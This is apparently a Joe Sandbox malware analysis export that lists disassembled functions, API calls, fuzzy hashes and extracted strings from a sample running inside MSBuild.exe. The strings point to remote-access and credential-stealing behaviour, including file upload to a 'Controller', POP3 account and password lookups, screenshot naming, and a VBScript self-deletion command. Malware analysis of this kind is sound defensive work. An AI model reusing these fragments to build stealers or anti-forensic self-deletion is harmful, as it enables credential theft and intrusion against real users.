                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                                    • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
                                                                                                                                                                                    • API String ID: 1579085052-1088133900
                                                                                                                                                                                    • Opcode ID: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                                                                                                                    • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                                                                                                                    • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                      • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                      • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                    • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                    • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                    • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                                    • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                                    • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                    • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                                                                                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                                                                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                                                                                                    • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041B313
                                                                                                                                                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041B370
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                    • String ID: ?
                                                                                                                                                                                    • API String ID: 3941738427-1684325040
                                                                                                                                                                                    • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                                                                    • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                    • API String ID: 4218353326-230879103
                                                                                                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                    • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3899193279-0
                                                                                                                                                                                    • Opcode ID: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                                                                                                                                    • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dff80f9f2e6418a47ef4f1e3ec22160d27dda194db1b92759e52112f0dcc884
                                                                                                                                                                                    • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                    • API String ID: 2490988753-744132762
                                                                                                                                                                                    • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                    • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                                                                                    • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                    • String ID: Close
                                                                                                                                                                                    • API String ID: 1657328048-3535843008
                                                                                                                                                                                    • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                    • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                                                    • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                                                                                    • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                                                                                    • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                    • API String ID: 1884690901-3066803209
                                                                                                                                                                                    • Opcode ID: e7cb10d7a94769719a081af647e736dceef02ed1fe18e96074c9815947bd0f8d
                                                                                                                                                                                    • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7cb10d7a94769719a081af647e736dceef02ed1fe18e96074c9815947bd0f8d
                                                                                                                                                                                    • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                      • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                    • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                    • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                    • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                    • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                    • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                    • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                    • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                    • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                    • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                    • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                    • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                    • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                    • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                    • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                    • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                                                                                      • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                                                                                    • _free.LIBCMT ref: 004500A6
                                                                                                                                                                                      • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                                      • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                                                    • _free.LIBCMT ref: 004500C8
                                                                                                                                                                                    • _free.LIBCMT ref: 004500DD
                                                                                                                                                                                    • _free.LIBCMT ref: 004500E8
                                                                                                                                                                                    • _free.LIBCMT ref: 0045010A
                                                                                                                                                                                    • _free.LIBCMT ref: 0045011D
                                                                                                                                                                                    • _free.LIBCMT ref: 0045012B
                                                                                                                                                                                    • _free.LIBCMT ref: 00450136
                                                                                                                                                                                    • _free.LIBCMT ref: 0045016E
                                                                                                                                                                                    • _free.LIBCMT ref: 00450175
                                                                                                                                                                                    • _free.LIBCMT ref: 00450192
                                                                                                                                                                                    • _free.LIBCMT ref: 004501AA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                    • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                    • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                    • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                    • API String ID: 489098229-65789007
                                                                                                                                                                                    • Opcode ID: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                                                                    • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                                                                                                    • Opcode Fuzzy Hash: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                      • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                      • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                      • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                                                                    • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                                                                                                    • API String ID: 1913171305-390638927
                                                                                                                                                                                    • Opcode ID: 39b3ce55d3e57c7dd47d2fbf93a6b3f51a62715a063ab856270c8441b234f796
                                                                                                                                                                                    • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 39b3ce55d3e57c7dd47d2fbf93a6b3f51a62715a063ab856270c8441b234f796
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
